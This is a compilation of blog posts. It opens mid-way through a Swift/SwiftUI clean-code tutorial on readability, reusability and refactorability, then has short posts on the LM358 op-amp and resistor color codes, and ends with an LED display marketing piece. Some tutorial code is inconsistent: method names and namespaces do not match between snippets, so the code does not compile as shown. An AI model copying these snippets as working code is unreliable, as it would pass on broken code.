.resizable().frame(width: 50, height: 50)
VStack(alignment: .leading) {
Text(i.pdt).bold()
Text(i.desc)
}
Spacer()
Text(
"\(c) \(i.price)"
)
}
}}.listStyle(PlainListStyle())
}
}
// InventoryItem model
struct invItem {
var pdt: String ,img: String, desc: String
var price: Int
var c: String
}
```
There are a number of problems we can see right away:
* Inconsistent and unpleasant formatting
* Poorly named variables
* Disorganized data structures (inventory using a dictionary)
* Comments that are either unnecessary or serve the job of what a good variable name would
* Hardcoded values (currency symbol)
* Improper model definition (invItem should conform to Identifiable)
* Redundant code (currency property in invItem not used)
* Unnecessary forced unwrapping
* Improper list style selection
Let's take a look at how we could improve it:
```swift
// Example/GoodCode/GoodCode/Readability/Readability.InventoryView.swift
import SwiftUI
struct InventoryView: View {
@State private var inventory = [
InventoryItem(
id: 0,
product: "Flashlight",
image: "placeholder",
description: "A really great flashlight",
price: 100,
currency: .usd
),
InventoryItem(
id: 1,
product: "Tin can",
image: "placeholder",
description: "Pretty much what you would expect from a tin can",
price: 32,
currency: .usd
),
InventoryItem(
id: 2,
product: "Cardboard Box",
image: "placeholder",
description: "It holds things",
price: 5,
currency: .usd
)
]
var body: some View {
List {
ForEach(inventory) { item in
HStack {
Image(item.image)
.resizable()
.frame(width: 50, height: 50)
VStack(alignment: .leading) {
Text(item.product)
.font(.headline)
Text(item.description)
.foregroundColor(.gray)
}
Spacer()
Text(item.priceFormatted)
.font(.headline)
.foregroundColor(.blue)
}
}
}
.listStyle(PlainListStyle())
}
}
struct InventoryItem: Identifiable {
var id: Int
var product: String
var image: String
var description: String
var price: Int
var currency: Currency
var priceFormatted: String {
"\(currency.symbol) \(price)"
}
}
enum Currency {
case usd
var symbol: String {
switch self {
case .usd:
return "$"
}
}
}
```
This improved code now exhibits the following features:
* It is consistently formatted using the automatic formatter [SwiftFormat](https://github.com/nicklockwood/SwiftFormat)
* Names are much more descriptive
* Data structures are properly organized.
* Comments are no longer needed because good naming serves to clarify the meaning of the code. Comments are needed when business logic is complex and when documentation is required.
To see more code improvements based on SOLID, read: [clean-code-swift](https://github.com/MaatheusGois/clean-code-swift)
## 2. Reusability
Reusability is the sole reason you are able to read this code, communicate with strangers online, and even program at all. Reusability allows us to express new ideas with little pieces of the past.
That is why reusability is such an essential concept that should guide your software architecture. We commonly think of reusability in terms of DRY (Don't Repeat Yourself). That is one aspect of it -- don't have duplicate code if you can abstract it properly. Reusability goes beyond that though. It's about making clean, simple APIs that make your fellow programmer say, "Yep, I know exactly what that does!" Reusability makes your code a delight to work with, and it means you can ship features faster.
We will look at our previous example and expand upon it by adding a `Currency Converter` to handle our inventory's pricing in multiple countries:
```swift
// Example/GoodCode/GoodCode/Reusability/InventoryViewWithChoice.swift
import SwiftUI
struct InventoryViewWithChoice: View {
@State private var localCurrency = Currency.usd
@State private var inventory = [
InventoryItem(
id: 0,
product: "Flashlight",
image: "placeholder",
description: "A really great flashlight",
price: 100,
currency: .usd
),
InventoryItem(
id: 1,
product: "Tin can",
image: "placeholder",
description: "Pretty much what you would expect from a tin can",
price: 32,
currency: .usd
),
InventoryItem(
id: 2,
product: "Cardboard Box",
image: "placeholder",
description: "It holds things",
price: 5,
currency: .usd
)
]
private let currencyConversions: [Currency: [Currency: Double]] = [
.usd: [.usd: 1.0, .rupee: 66.78, .yuan: 6.87],
.rupee: [.usd: 1/66.78, .rupee: 1.0, .yuan: 0.107],
.yuan: [.usd: 1/6.87, .rupee: 9.35, .yuan: 1.0]
]
var body: some View {
VStack(alignment: .leading) {
Text("Inventory")
.font(.title)
.padding()
Picker("Currency", selection: $localCurrency) {
ForEach(Currency.allCases, id: \.self) { currency in
Text(currency.name).tag(currency)
}
}
.pickerStyle(SegmentedPickerStyle())
.padding(.horizontal)
List(inventory) { item in
HStack {
Image(item.image)
.resizable()
.frame(width: 50, height: 50)
VStack(alignment: .leading) {
Text(item.product)
.font(.headline)
Text(item.description)
.font(.caption)
.foregroundColor(.gray)
}
Spacer()
Text(
convertCurrency(
price: item.price,
fromCurrency: item.currency,
toCurrency: localCurrency
)
)
.font(.headline)
.foregroundColor(.blue)
}
}
.listStyle(PlainListStyle())
}
}
private func convertCurrency(
price: Int,
fromCurrency: Currency,
toCurrency: Currency
) -> String {
let convertedAmount = Double(price) * currencyConversions[fromCurrency]![toCurrency]!
return "\(toCurrency.symbol)\(String(format: "%.2f", convertedAmount))"
}
}
struct InventoryItem: Identifiable {
var id: Int
var product: String
var image: String
var description: String
var price: Int
var currency: Currency
var priceFormatted: String {
"\(currency.symbol) \(price)"
}
}
enum Currency: CaseIterable {
case usd
case rupee
case yuan
var name: String {
switch self {
case .usd:
return "USD"
case .rupee:
return "Rupee"
case .yuan:
return "Yuan"
}
}
var symbol: String {
switch self {
case .usd:
return "$"
case .rupee:
return "₹"
case .yuan:
return "元"
}
}
}
```
This code works, but merely working is not the point of code. That's why we need to examine it through a stronger lens than just checking whether it works and is readable. We have to ask whether it's reusable. Do you notice any issues?
Think about it!
Alright, there are 3 main issues in the code above:
* The Currency Selector is coupled to the Inventory component
* The Currency Converter is coupled to the Inventory component
* The Inventory data is defined explicitly inside the Inventory component rather than being provided to it through an API.
Every function and module should just do one thing, otherwise it can be very difficult to figure out what is going on when you look at the source code. The Inventory component should just be for displaying an inventory, not converting and selecting currencies. The benefit of making modules and functions do one thing is that they are easier to test and they are easier to reuse. If we wanted to use our Currency Converter in another part of the application, we would have to include the whole Inventory component. That doesn't make sense if we just need to convert currency.
Let's see what this looks like with more reusable components:
```swift
// Example/GoodCode/GoodCode/Reusability/ViewModels/Reusability.CurrencyConverter.swift
import SwiftUI
class CurrencyConverter: ObservableObject {
@Published var localCurrency = Currency.usd
private let currencyConversions: [Currency: [Currency: Double]] = [
.usd: [.usd: 1.0, .rupee: 66.78, .yuan: 6.87],
.rupee: [.usd: 1/66.78, .rupee: 1.0, .yuan: 0.107],
.yuan: [.usd: 1/6.87, .rupee: 9.35, .yuan: 1.0]
]
func convertCurrency(
price: Int,
fromCurrency: Currency
) -> String {
let convertedAmount = Double(price) * currencyConversions[fromCurrency]![localCurrency]!
return "\(localCurrency.symbol)\(String(format: "%.2f", convertedAmount))"
}
}
```
```swift
// Example/GoodCode/GoodCode/Reusability/Views/Readability.CurrencySelector.swift
import SwiftUI
struct CurrencySelector: View {
@Binding var selectedCurrency: Currency
var body: some View {
Picker("Currency", selection: $selectedCurrency) {
ForEach(Currency.allCases, id: \.self) { currency in
Text(currency.name).tag(currency)
}
}
.pickerStyle(SegmentedPickerStyle())
.padding(.horizontal)
}
}
```
```swift
// Example/GoodCode/GoodCode/Reusability/Views/Readability.Inventory.swift
import SwiftUI
struct Inventory: View {
@State private var inventory: [InventoryItem]
@ObservedObject private var currencyConverter: CurrencyConverter
init(inventory: [InventoryItem], currencyConverter: CurrencyConverter) {
self.inventory = inventory
self.currencyConverter = currencyConverter
}
var body: some View {
List(inventory) { item in
HStack {
Image(item.image)
.resizable()
.frame(width: 50, height: 50)
VStack(alignment: .leading) {
Text(item.product)
.font(.headline)
Text(item.description)
.font(.caption)
.foregroundColor(.gray)
}
Spacer()
Text(
currencyConverter.convertCurrency(
price: item.price,
fromCurrency: item.currency
)
)
.font(.headline)
.foregroundColor(.blue)
}
}
.listStyle(PlainListStyle())
}
}
```
```swift
// Example/GoodCode/GoodCode/Reusability/Views/Reusability.InventoryList.swift
import SwiftUI
struct InventoryList: View {
@State private var inventory = [
InventoryItem(
id: 0,
product: "Flashlight",
image: "placeholder",
description: "A really great flashlight",
price: 100,
currency: .usd
),
InventoryItem(
id: 1,
product: "Tin can",
image: "placeholder",
description: "Pretty much what you would expect from a tin can",
price: 32,
currency: .usd
),
InventoryItem(
id: 2,
product: "Cardboard Box",
image: "placeholder",
description: "It holds things",
price: 5,
currency: .usd
)
]
@ObservedObject private var currencyConverter = CurrencyConverter()
var body: some View {
VStack(alignment: .leading) {
Title()
CurrencySelector(selectedCurrency: $currencyConverter.localCurrency)
Inventory(inventory: inventory, currencyConverter: currencyConverter)
}
}
func Title() -> some View {
Text("Inventory")
.font(.title)
.padding()
}
}
```
This code has seen significant improvements. We now have individual modules for currency selection and conversion, and we can provide inventory data to our Inventory component without modifying its source code. This decoupling embodies the Dependency Inversion Principle, a powerful approach to creating reusable code.
However, before diving into making everything reusable, it's crucial to realize that reusability requires a well-designed API. If the API is poorly designed, future updates could harm its users. So, when should code NOT be made reusable?
- If you can't define a good API yet, avoid creating a separate module. Duplication is better than a bad foundation.
- If you don't expect to reuse your function or module in the near future.
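To make the Dependency Inversion idea above concrete, here is a minimal, self-contained sketch (the protocol and type names are illustrative, not part of the example app): the consumer depends on an abstraction, and any conforming converter can be injected without touching the consumer's source.

```swift
import Foundation

// The consumer depends on this abstraction, not on a concrete type.
protocol PriceConverting {
    func convert(price: Int) -> String
}

struct USDFormatter: PriceConverting {
    func convert(price: Int) -> String { "$\(price)" }
}

// InventoryRow never changes, no matter which converter is injected.
struct InventoryRow {
    let converter: any PriceConverting
    func label(for price: Int) -> String {
        converter.convert(price: price)
    }
}

let row = InventoryRow(converter: USDFormatter())
print(row.label(for: 32)) // "$32"
```

Swapping in a different `PriceConverting` implementation (say, one for rupees) requires no change to `InventoryRow` at all.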
## 3. Refactorability
Refactorable code is code you can change without fear. It's code you can deploy on a Friday night and return to on Monday morning without worrying about runtime errors affecting your users.
Refactorability is about the system as a whole, about how your reusable modules connect like LEGO pieces. If changing your `Employee` module breaks your `Reporting` module, you have refactorability issues. Refactorability is the highest level in the 3R hierarchy and the hardest to achieve and maintain. While there will always be issues in any human system, there are strategies to enhance refactorability:
- Isolated side effects
- Tests
- Static types
For large applications, lean on Swift's static type system; it is one of the language's greatest assets here. Types provide extra confidence beyond what tests can offer. However, types alone aren't enough; you also need to isolate side effects and test your code.
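A small illustration of the confidence static types provide, in plain Swift (using a trimmed-down version of the `Currency` enum from earlier):

```swift
import Foundation

enum Currency: CaseIterable { case usd, rupee, yuan }

// The switch is exhaustive: add a new Currency case later and this
// function stops COMPILING until the new case is handled. The type
// system catches the omission before a single test runs.
func symbol(for currency: Currency) -> String {
    switch currency {
    case .usd: return "$"
    case .rupee: return "₹"
    case .yuan: return "元"
    }
}

print(symbol(for: .rupee)) // "₹"
```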
You might wonder what it means to isolate side effects. A _side effect_ occurs when a function or module modifies data outside its own scope. Writing data to a disk, changing a global variable, or printing to the Xcode console are examples of side effects. While side effects are necessary for a program to interact with the outside world, they should be isolated.
Why should we isolate side effects?
- Side effects make code hard to test. If a function's execution modifies data that another function depends on, we can't ensure consistent output from the same input.
- Side effects introduce coupling between otherwise reusable modules. If module A modifies global state that module B depends on, A must run before B.
- Side effects make the system unpredictable. If any function or module can alter the application state, we can't be sure how changes in one module will impact the entire system.
To isolate side effects, centralize the updating of global state within the application.
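The difference between side-effecting and pure code can be sketched in a few lines (the names are illustrative):

```swift
import Foundation

var cartTotal = 0 // global state

// Impure: mutates state outside its own scope. Its effect depends on
// whatever the rest of the program has already done to cartTotal.
func addToCartImpure(price: Int) {
    cartTotal += price
}

// Pure: the same inputs always produce the same output, and the
// caller decides where the result is stored.
func addedToCart(total: Int, price: Int) -> Int {
    total + price
}

// The pure function is trivially testable; the actual mutation is
// then performed in exactly one, centralized place.
cartTotal = addedToCart(total: cartTotal, price: 100)
print(cartTotal) // 100
```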
Now, let's modify our existing code to incorporate a `Shopping Cart`. We'll examine this new code to understand why it is NOT refactorable:
```swift
// Example/BadCode/BadCode/Refactorability/GlobalState.swift
import Foundation
class GlobalState {
static let shared = GlobalState()
var cart: [InventoryItem] = []
}
```
```swift
// Example/BadCode/BadCode/Refactorability/Cart.swift
import SwiftUI
struct Cart: View {
@State private var cart: [InventoryItem]
private var currencyConverter: CurrencyConverter
@State private var timer: Timer?
init(
currencyConverter: CurrencyConverter
) {
self.cart = GlobalState.shared.cart
self.currencyConverter = currencyConverter
}
var body: some View {
VStack {
Text("Cart")
.font(.largeTitle)
if cart.isEmpty {
Text("Nothing in the cart")
} else {
List(cart) { item in
HStack {
Text(item.product)
Spacer()
Text(
currencyConverter.convertCurrency(
price: item.price,
fromCurrency: item.currency
)
)
}
}
}
}
.onAppear {
startWatchingCart()
}
.onDisappear {
stopWatchingCart()
}
}
func startWatchingCart() {
timer = Timer.scheduledTimer(withTimeInterval: 1, repeats: true) { _ in
cart = GlobalState.shared.cart
}
}
func stopWatchingCart() {
timer?.invalidate()
}
}
```
Here we have a new shopping cart module that shows the inventory items currently in the shopping cart. There are several very problematic things in this code. What are they?
Think about it!
The main issues with the code above are:
* Global State: The `GlobalState` singleton is problematic because any code can read or modify it, making the system fragile and difficult to debug.
* Timer for Synchronization: The `Cart` uses a `Timer` to periodically update the local state from the global cart. This introduces a coupling to timing, which can lead to synchronization issues and unexpected behavior.
* Lack of Centralized State Management: There is no centralized place to manage the state updates, making the system unpredictable. Any part of the app can modify the global state, leading to potential conflicts and bugs.
* View Initialization: The views are initialized with local states that mirror the global state, which can become out of sync and cause inconsistencies in the UI.
This bad example showcases the issues of using global variables and timing dependencies, making the code hard to maintain and refactor. It demonstrates how these anti-patterns can lead to a brittle and unpredictable system.
Even though our modules are reusable and readable, by writing to global variables we are making our overall system very brittle. Any third-party library that we bring in could overwrite our `GlobalState.cart` with something else and break our app. Furthermore, any module we write can access it and modify it without any safeguards or centralized way of updating.
You might be saying, "Yeah, yeah I would never structure my app like this in the first place." That's great! Remember though, that even though this is exaggerated, the point is that the way the cart is updated and read is not centralized. If instead of using global variables and `Timer` you were using a message passing module, that could also make your code hard to understand and refactor at scale because it could be hard to isolate state and figure out how one module might affect another.
Let's see what this more refactorable code looks like:
```swift
// Example/GoodCode/GoodCode/Refactorability/States/Refactorability.CentralState.swift
import SwiftUI
class CentralState: ObservableObject {
static let shared = CentralState()
@Published var cart: [InventoryItem] = []
@Published var inventory: [InventoryItem] = []
@Published var localCurrency: Currency = .usd
func addToCart(item: InventoryItem) {
cart.append(item)
}
func setInventory(items: [InventoryItem]) {
inventory = items
}
func setLocalCurrency(currency: Currency) {
localCurrency = currency
}
}
```
```swift
// Example/GoodCode/GoodCode/Refactorability/States/Refactorability.Inventory.swift
import SwiftUI
struct Inventory: View {
@ObservedObject private var currencyConverter: CurrencyConverter
@EnvironmentObject var centralState: CentralState
init(currencyConverter: CurrencyConverter) {
self.currencyConverter = currencyConverter
}
var body: some View {
List(centralState.inventory) { item in
HStack {
Image(item.image)
.resizable()
.frame(width: 50, height: 50)
VStack(alignment: .leading) {
Text(item.product)
.font(.headline)
Text(item.description)
.font(.caption)
.foregroundColor(.gray)
}
Spacer()
Text(
currencyConverter.convert(
price: item.price,
fromCurrency: item.currency
)
)
.font(.headline)
.foregroundColor(.blue)
Button(action: {
centralState.addToCart(item: item)
}) {
Text("Add")
}
.buttonStyle(.bordered)
}
}
.listStyle(PlainListStyle())
}
}
```
```swift
// Example/GoodCode/GoodCode/Refactorability/States/Refactorability.Cart.swift
import SwiftUI
struct Cart: View {
@EnvironmentObject var centralState: CentralState
private var currencyConverter = CurrencyConverter()
var body: some View {
VStack {
Text("Cart")
.font(.largeTitle)
if centralState.cart.isEmpty {
Text("Nothing in the cart")
} else {
List(centralState.cart) { item in
HStack {
Text(item.product)
Spacer()
Text(convertedPrice(for: item))
}
}
}
}
}
func convertedPrice(for item: InventoryItem) -> String {
return currencyConverter.convert(price: item.price, fromCurrency: item.currency)
}
}
```
```swift
// Example/GoodCode/GoodCode/Refactorability/States/Refactorability.InventoryList.swift
import SwiftUI
struct InventoryList: View {
@EnvironmentObject var centralState: CentralState
@StateObject private var currencyConverter = CurrencyConverter() // view-owned, so @StateObject, not @ObservedObject
var body: some View {
VStack {
Title()
Refactorability.Inventory(currencyConverter: currencyConverter)
Spacer()
NextButton()
}
}
func Title() -> some View {
Text("Inventory")
.font(.title)
.padding()
}
func NextButton() -> some View {
Section {
Text("Total in cart \(centralState.cart.count)")
.font(.headline)
.padding()
}
}
}
```
```swift
struct RefactorabilityStatesPreview: PreviewProvider {
static var previews: some View {
Refactorability.InventoryList()
.environmentObject(Refactorability.CentralState.mock)
}
}
```
This improved code centralizes our side effects to a method within the `CentralState` class, which takes an `InventoryItem` and adds it to the cart. The cart is managed as a `@Published` property within `CentralState`, ensuring that all components that depend on the cart's state are automatically notified and updated when the state changes. SwiftUI intelligently re-renders each updated view, maintaining a clear and predictable state flow.
This approach ensures that the state of the application can only be updated in one way, through the `CentralState` class. There's no need for global state modifications, no messages to pass, and no uncontrolled side effects that our modules can produce. The best part is, we can keep track of the entire state of our application, making debugging and QA much easier because we have an exact snapshot in time of our entire application.
One caveat to note: you might not need a complex state management solution in this project's example application. However, as the codebase grows, it would become more manageable to use a state management solution like the `CentralState` class instead of putting everything in top-level controllers. By isolating the state management in `CentralState` early on, we ensure that our application remains scalable and maintainable without requiring significant changes as it develops.
Explanation:
* Centralized State Management: `CentralState` class acts as a single source of truth for the application's state. It uses `@Published` properties to automatically notify views of state changes.
* Environment Object: By using `@EnvironmentObject`, we inject the central state into views that need access to the shared state, ensuring that state updates are managed centrally and propagated automatically.
* Simplified Conversion Logic: The `CurrencyConverter` class provides a method to convert prices based on currencies, similar to the provided currency converter in the JavaScript code.
* Structuring Views: `Inventory` and `Cart` are designed to work with the central state, accessing and modifying it via the `EnvironmentObject` pattern.
This structure makes it easier to manage state changes, ensures a clear flow of data, and reduces the potential for side effects and bugs. The state updates follow a predictable pattern, making the code easier to maintain and debug.
### Tests
The last thing we need to look at is tests. Tests give us confidence that we can change a module and it will still do what it was intended to do. We will look at the tests for `CentralState` and `CurrencyConverter`:
```swift
// Example/GoodCode/Tests/CentralState.Tests.swift
import XCTest
@testable import GoodCode
class CentralStateTests: XCTestCase {
let centralState = Refactorability.CentralState.mock
func testAddToCart() {
let item = Readability.InventoryItem(
id: 0,
product: "Flashlight",
image: "placeholder",
description: "A really great flashlight",
price: 100,
currency: .usd
)
centralState.addToCart(item: item)
XCTAssertEqual(centralState.cart.count, 1)
XCTAssertEqual(centralState.cart.first, item)
}
func testSetInventory() {
let items = [
Readability.InventoryItem(
id: 0,
product: "Flashlight",
image: "placeholder",
description: "A really great flashlight",
price: 100,
currency: .usd
),
Readability.InventoryItem(
id: 1,
product: "Tin can",
image: "placeholder",
description: "Pretty much what you would expect from a tin can",
price: 32,
currency: .usd
),
Readability.InventoryItem(
id: 2,
product: "Cardboard Box",
image: "placeholder",
description: "It holds things",
price: 5,
currency: .usd
)
]
centralState.setInventory(items: items)
XCTAssertEqual(centralState.inventory, items)
}
func testSetLocalCurrency() {
let currency = Readability.Currency.usd
centralState.setLocalCurrency(currency: currency)
XCTAssertEqual(centralState.localCurrency, currency)
}
}
extension Readability.InventoryItem: Equatable {
public static func == (lhs: Readability.InventoryItem, rhs: Readability.InventoryItem) -> Bool {
lhs.id == rhs.id
}
}
```
```swift
// Example/GoodCode/Tests/CurrencyConverter.Tests.swift
import XCTest
@testable import GoodCode
class CurrencyConverterTests: XCTestCase {
func testConvert() {
let converter = Reusability.CurrencyConverter()
converter.localCurrency = .usd
// A USD price with USD as the local currency should pass through unchanged
let usdToLocal = converter.convert(price: 100, fromCurrency: .usd)
XCTAssertEqual(usdToLocal, "$100.00")
// Test conversion from Rupee to the local currency (USD)
let rupeeToLocal = converter.convert(price: 500, fromCurrency: .rupee)
XCTAssertEqual(rupeeToLocal, "$7.49")
// Test conversion from Yuan to the local currency (USD)
let yuanToLocal = converter.convert(price: 1000, fromCurrency: .yuan)
XCTAssertEqual(yuanToLocal, "$145.56")
}
}
```
These tests verify that `CentralState` and `CurrencyConverter` behave as expected:
* `testAddToCart` verifies that adding an item to the cart works correctly by checking that the cart contains the correct item and that the item count is as expected.
* `testSetInventory` ensures the inventory is set correctly by comparing the current inventory state with the expected list of items.
* `testSetLocalCurrency` confirms that setting the local currency updates the state properly by checking that the local currency state matches the expected currency.
* `testConvert` checks the conversion logic for different currency pairs (Rupee to USD, Yuan to USD, and a USD pass-through) to verify the correctness of the converted values.
## Final Thoughts
Software architecture is the stuff that's hard to change, so invest early in a readable, reusable, and refactorable foundation. It will be hard to get there later on. By following the 3 Rs, your users will thank you, your developers will thank you, and you will thank yourself.
---
## Contributing
Thank you for your contributions!
Before opening a friendly Pull Request, make sure you run the linter and resolve any errors it reports.
Finally, change any relevant code examples in this `README.md` to reflect your changes.
## License
[MIT](LICENCE)
*Author: maatheusgois*

---

# LM358 Overview

*Published 2024-07-10 · by candice88771483 · tags: lm358 · https://dev.to/candice88771483/lm358-overview-2de*

## Introduction
As far as we know, there are various configurations available for 555 timers, single logic gates, microcontrollers, microprocessors, voltage regulators, and op-amps. These ICs include the LM741, LM7805, LM35, LM324 IC, LM337 IC, LM338 IC, LM339 IC, LM1117, and many others.
The most commonly used integrated circuit (IC) in electronic sensors and many other circuits is the LM358 IC. You will learn how to use it and explore different DIY electronics projects in this blog.
## Ⅰ LM358 Overview
The [LM358 IC](https://www.blikai.com/blog/integrated-circuit/lm358-ic-features-applications-and-types) is a dual op-amp integrated circuit containing two op-amps powered by a common power supply. It can be considered as one-half of the LM324 Quad op-amp, which contains four op-amps with a common power supply. The differential input voltage range can be equal to the power supply voltage. The default input offset voltage is very low, typically around 2mV. The typical supply current is 500uA regardless of the supply voltage range, with a maximum current of 700uA. The operating temperature ranges from 0˚C to 70˚C ambient, while the maximum junction temperature can reach up to 150˚C.
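To get a feel for what these numbers mean in practice, here is a small illustrative Python sketch (not from the original article) that applies two typical LM358 figures, the 2 mV input offset voltage and the roughly 1 MHz gain-bandwidth product, to a hypothetical non-inverting amplifier stage. The resistor values are assumptions chosen to give a gain of 100.

```python
# Illustrative sketch: what the LM358's typical specs mean in a real circuit.
# Assumed values: typical input offset voltage 2 mV, gain-bandwidth ~1 MHz.

V_OS = 2e-3   # typical input offset voltage, volts
GBW = 1e6     # gain-bandwidth product, hertz

def noninverting_gain(r_feedback: float, r_ground: float) -> float:
    """Closed-loop gain of a non-inverting op-amp stage: 1 + Rf/Rg."""
    return 1 + r_feedback / r_ground

def output_offset_error(gain: float, v_os: float = V_OS) -> float:
    """The input offset voltage appears at the output multiplied by the gain."""
    return gain * v_os

def closed_loop_bandwidth(gain: float, gbw: float = GBW) -> float:
    """First-order estimate: bandwidth shrinks as GBW / closed-loop gain."""
    return gbw / gain

gain = noninverting_gain(r_feedback=99e3, r_ground=1e3)  # gain of 100
print(f"gain = {gain:.0f}")
print(f"output error from offset ~ {output_offset_error(gain) * 1e3:.0f} mV")
print(f"usable bandwidth ~ {closed_loop_bandwidth(gain) / 1e3:.0f} kHz")
```

At a gain of 100, the typical offset alone can shift the output by about 200 mV and the usable bandwidth shrinks to roughly 10 kHz, which is why the LM358 suits low-frequency, non-precision work.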
## LM358 Features

- Consists of two op-amps internally.
- High output voltage swing.
- Large DC voltage gain of around 100 dB.
- Wide bandwidth of 1 MHz (temperature compensated).
- Very low supply current drain.
- Wide power supply range: single supply from 3 V to 32 V, dual supply from ±1.5 V to ±16 V.
- Low input offset voltage of 2 mV.
- Common-mode input voltage range includes ground.
- Differential input voltage range is similar to the power supply voltage.
- Internally frequency compensated for unity gain.
- Short-circuit-protected outputs.
- Soldering pin temperature of 260 °C.
- Available in TO-99, SOIC, DSBGA, and CDIP packages.

*Author: candice88771483*

---

# Decode the 10K Resistor Color Code Like a Pro!

*Published 2024-07-10 · by candice88771483 · tags: webdev · https://dev.to/candice88771483/decode-the-10k-resistor-color-code-like-a-pro-51d0*

Discovering the secret language of resistors, particularly the [10k resistor color code](https://www.blikai.com/blog/components-parts/10k-resistor-color-code-everything-you-need-to-know), is like cracking a cryptic code.
Think of resistors as traffic wardens for electrons in an electrical circuit. They control the flow of current and lower voltage levels within circuits. To put it in a more relatable way, they're like the speed bumps on your neighborhood roads, slowing down speeding cars (or in this case, electrons).
Consider this: you're building a model car for your kid. You'll need resistors to ensure the mini lights in the model don't burn out due to excess voltage. Thus, resistors are a vital component of all electronic devices, from the smallest toys to large supercomputers.
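The speed-bump analogy maps directly onto Ohm's law: to keep a small lamp or LED from seeing excess voltage, you put a series resistor in front of it sized as R = (V_supply - V_device) / I. The supply, forward-voltage, and current figures below are illustrative assumptions, not values from the article.

```python
def series_resistor(v_supply: float, v_device: float, i_amps: float) -> float:
    """Resistance needed to drop the excess voltage at the desired current (Ohm's law)."""
    return (v_supply - v_device) / i_amps

# Example: 5 V battery pack, a 2 V indicator LED, 10 mA target current.
r = series_resistor(v_supply=5.0, v_device=2.0, i_amps=0.010)
print(f"Use roughly a {r:.0f} Ω resistor")  # (5 - 2) / 0.01 = 300 Ω
```

This is exactly the calculation behind protecting the mini lights in the model car: the resistor absorbs the voltage the lights cannot handle.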
## Different Types of Resistors
Just as there are various types of speed bumps, there are numerous types of resistors. They come in different forms, sizes, and resistance values, such as carbon film, metal film, wirewound, and SMD. The choice depends on the requirement, precision, and application.
Among the various resistors, our hero for the day is the 10K ohm resistor. It's commonly used in many electronic circuits due to its versatility and ideal resistance value.
## Understanding Resistor Color Codes
The rainbow-like bands on resistors aren't just for decoration. They're a secret language, revealing the resistor's resistance, tolerance, and sometimes even temperature coefficient.
Each color represents a number from 0 to 9. These numbers, read in a particular order, help you understand the resistor's resistance value and tolerance.
Resistors can have 4, 5, or 6 bands. The 4-band resistors are like the original trilogy of Star Wars, widely recognized and adored. But then came the prequels and sequels, the 5-band and 6-band resistors, offering more precision and information.
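The band-reading rules above can be sketched as a tiny decoder. The color-to-digit mapping is the standard convention (black = 0 through white = 9, gold = ±5% tolerance); the code itself is an illustrative sketch for 4-band resistors, not something from the article.

```python
# Standard resistor color code: two digit bands, a multiplier band
# (a power of ten), and a tolerance band (gold = ±5%, silver = ±10%).
DIGITS = ["black", "brown", "red", "orange", "yellow",
          "green", "blue", "violet", "gray", "white"]
TOLERANCE = {"brown": 1.0, "red": 2.0, "gold": 5.0, "silver": 10.0}

def decode_4_band(b1: str, b2: str, b3: str, b4: str) -> tuple[float, float]:
    """Return (resistance in ohms, tolerance in percent) for a 4-band resistor."""
    value = (DIGITS.index(b1) * 10 + DIGITS.index(b2)) * 10 ** DIGITS.index(b3)
    return float(value), TOLERANCE[b4]

# A 10K resistor reads brown-black-orange-gold: digits 1 and 0, x10^3, ±5%.
ohms, tol = decode_4_band("brown", "black", "orange", "gold")
print(f"{ohms:.0f} Ω ±{tol}%")  # 10000 Ω ±5.0%
```

Reading a 10K resistor's bands (brown, black, orange, gold) through this decoder yields 10,000 Ω at ±5% tolerance.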
*Author: candice88771483*

---

# Small-pitch LED display market: new opportunities and challenges

*Published 2024-07-10 · by sostrondylan · tags: led, display, pitch · https://dev.to/sostrondylan/small-pitch-led-display-market-new-opportunities-and-challenges-fd8*

## Introduction
With the continuous advancement of technology and the growing market demand, the [small-pitch LED display](https://sostron.com/products/cobra-cob-led-display/) market is becoming the new favorite of the LED display industry. Despite the fierce competition and overcapacity in the domestic market, the rapid development of small-pitch LED displays has brought new growth points and market opportunities to Chinese companies.

## Current situation of competition in the Chinese market
The Chinese LED display market has experienced a period of rapid development, but it has been followed by problems of market saturation and overcapacity. Against this background, many companies have begun to seek new market growth points in order to convert excess capacity into economic benefits. [How to find a Chinese LED screen factory? ](https://sostron.com/chinese-led-screen-factory-this-is-the-more-reliable-way-to-find-it/)

## Exploration of international markets
Faced with the challenges of the domestic market, Chinese LED display companies have turned their attention to the international market to seek new growth opportunities. So, where are the main markets for Chinese LED display companies overseas?

## Traditional advertising market
Although the technology of small-pitch LED display screens is becoming increasingly mature, the traditional LED display screen market still maintains strong vitality in some special fields. Especially in Southeast Asia, Africa and other regions, the traditional outdoor direct plug-in market still has broad development space. In addition, even in the European and American markets with high display requirements, the traditional advertising market also occupies an important position. [Here is everything about small-pitch LED displays. ](https://sostron.com/everything-about-small-pitch-led-display/)

## Small-pitch LED display screen market
Small-pitch LED display screens are gradually becoming a new choice for urban commercial display application systems due to their advantages such as high clarity, high contrast and low energy consumption. According to statistics, the consumption and output value of small-pitch LEDs are growing rapidly, and it is expected that by 2021, the output value will reach 800 million US dollars. With the continuous advancement of technology, the dot pitch is also shrinking, and products such as P1.2 and P1.6 are gradually becoming the mainstream of the market. [Provide you with a guide to selecting the pitch of LED display screens. ](https://sostron.com/outdoor-led-display-spacing-selection-guide/)

## Technology and market entry threshold
The industrial chain of the small-pitch LED display market is becoming more mature, and the market entry threshold is gradually lowered. This provides more companies with opportunities to enter the market, while also intensifying market competition. However, due to cost issues, products below P1.0 are still mainly laboratory products, with less mass production.

## Overseas market analysis
Based on the sales of various companies in the first quarter of this year, we can understand the market situation of small-pitch LED displays in overseas markets. Especially in the European and American markets, P1.6 products have become the mainstream choice.
## Conclusion
The development of the small-pitch LED display market has brought new opportunities to the LED display industry, but also challenges. Companies need to continue to innovate, improve product quality, and reduce costs to adapt to the ever-changing market demand. With the continuous advancement of technology and the continuous development of the market, we have reason to believe that the small-pitch LED display market will usher in a broader development prospect.
Thank you for reading; I hope we helped solve your problem. Sostron is a professional LED display manufacturer (https://sostron.com/about-us/); we provide all kinds of displays, display leasing, and display solutions around the world. If you want to learn more, read: [Transparent LED display: Leading the new modern vision](https://dev.to/sostrondylan/transparent-led-display-leading-the-new-modern-vision-245o).
Follow me for more LED display knowledge!
Contact us on WhatsApp: https://api.whatsapp.com/send?phone=+8613570218702&text=Hello

*Author: sostrondylan*